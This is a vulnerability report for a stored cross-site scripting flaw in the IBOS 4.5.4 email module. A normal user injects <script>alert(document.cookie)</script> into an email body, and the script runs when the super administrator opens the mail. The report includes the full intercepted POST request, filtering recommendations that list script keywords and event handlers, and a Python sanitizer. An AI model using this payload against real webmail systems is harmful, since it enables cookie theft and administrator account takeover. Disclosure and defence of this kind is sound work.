OS: Windows
IBOS version: 4.5.4
Discovery time: 2020/1/12
IBOS download time: 2020/1/9
Create a new account test1 with normal user permissions.

Log in as test1 and open the email module.

Send an email to the super administrator.

Capture the request with a proxy, modify the value of the emailbody[content] parameter by appending a payload such as <script>alert(document.cookie)</script>, and "Forward" the modified request.

<script>alert(document.cookie)</script>
The test packet looks like this:
POST /?r=email/content/add HTTP/1.1
Host: 192.168.126.141:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 423
Origin: http://192.168.126.141:8090
Connection: close
Referer: http://192.168.126.141:8090/?r=email/content/add
Cookie: JV66_saltkey=R62zxTJ6; PHPSESSID=gsbu4no765jlira852mg7mp2b0; JV66_sid=K5NrmE; lastautologin=0; JV66_lastactivity=1578840035; JV66_ulastactivity=bd03C060mWlgg1zpb4SMJXTC9%2FA1PYx734o%2BZjxQ8U7Cnun%2FGGM0; JV66_lately.SelectBox=u_1; JV66_creditremind=0D0D2D1D0D0D5; JV66_creditbase=0D0D4D1D0D0; JV66_creditrule=%E5%86%99%E9%82%AE%E4%BB%B6; JV66_dropnotify=%7B%22user%22%3A%221%22%2C%22unread_notify%22%3A1%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A0%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A1%7D
Upgrade-Insecure-Requests: 1
emailbody%5Btoids%5D=u_1&emailbody%5BisOtherRec%5D=0&emailbody%5BisWebRec%5D=0&emailbody%5Bcopytoids%5D=&emailbody%5Bsecrettoids%5D=&emailbody%5Bimportant%5D=0&emailbody%5Bsubject%5D=aaaaaaaaaaaaaaaaa&file=&emailbody%5Battachmentid%5D=&emailbody%5Bissend%5D=1&op=new&backurl=http%3A%2F%2F192.168.126.141%3A8090%2F%3Fr%3Demail%2Flist%2Findex&formhash=0ea1467f&emailbody%5Bcontent%5D=%3Cp%3Eaaassssssssss%3Cbr%2F%3E%3C%2Fp%3E<script>alert(document.cookie)</script>
Log in as the super administrator and open the received email.

Viewing the email content executes the injected JavaScript, which then displays the cookie value.

Filter or encode special characters such as:
<
>
"
'
&
%
... ...
and filter keywords such as:
script
javascript
... ...
or filter HTML attributes (event handlers) that can run JavaScript, such as:
onclick
onerror
onload
... ...
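As an added illustration (not part of this report or of IBOS, whose fix would live in its PHP code, e.g. via htmlspecialchars() or an allowlist sanitizer such as HTMLPurifier), the Python below applies the allowlist idea behind the recommendations above to the emailbody[content] value from the captured request: the form body is an excerpt of the captured body trimmed to a few parameters, the rich-text tags a mail body needs are kept, every attribute (so every on* handler) is dropped, <script> elements are removed with their contents, and remaining text is HTML-encoded.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs
import html

# Excerpt of the captured POST /?r=email/content/add form body (trimmed).
FORM_BODY = ("emailbody%5Bsubject%5D=aaaaaaaaaaaaaaaaa&op=new&formhash=0ea1467f"
             "&emailbody%5Bcontent%5D=%3Cp%3Eaaassssssssss%3Cbr%2F%3E%3C%2Fp%3E"
             "<script>alert(document.cookie)</script>")

# Tags a mail body legitimately needs; everything else is discarded.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li"}
DROP_WITH_CONTENT = {"script", "style"}  # element and its text are removed


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # decode entities, re-encode below
        self.out = []
        self.skip = 0  # nesting depth inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
        elif tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"<{tag}>")  # attributes never survive

    def handle_startendtag(self, tag, attrs):  # e.g. <br/>
        if tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"<{tag}/>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=True))


def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def content_from_form(body: str) -> str:
    """Return the raw emailbody[content] value exactly as the server receives it."""
    return parse_qs(body)["emailbody[content]"][0]


if __name__ == "__main__":
    raw = content_from_form(FORM_BODY)
    print("received:", raw)
    print("stored:  ", sanitize(raw))  # <p>aaassssssssss<br/></p>
```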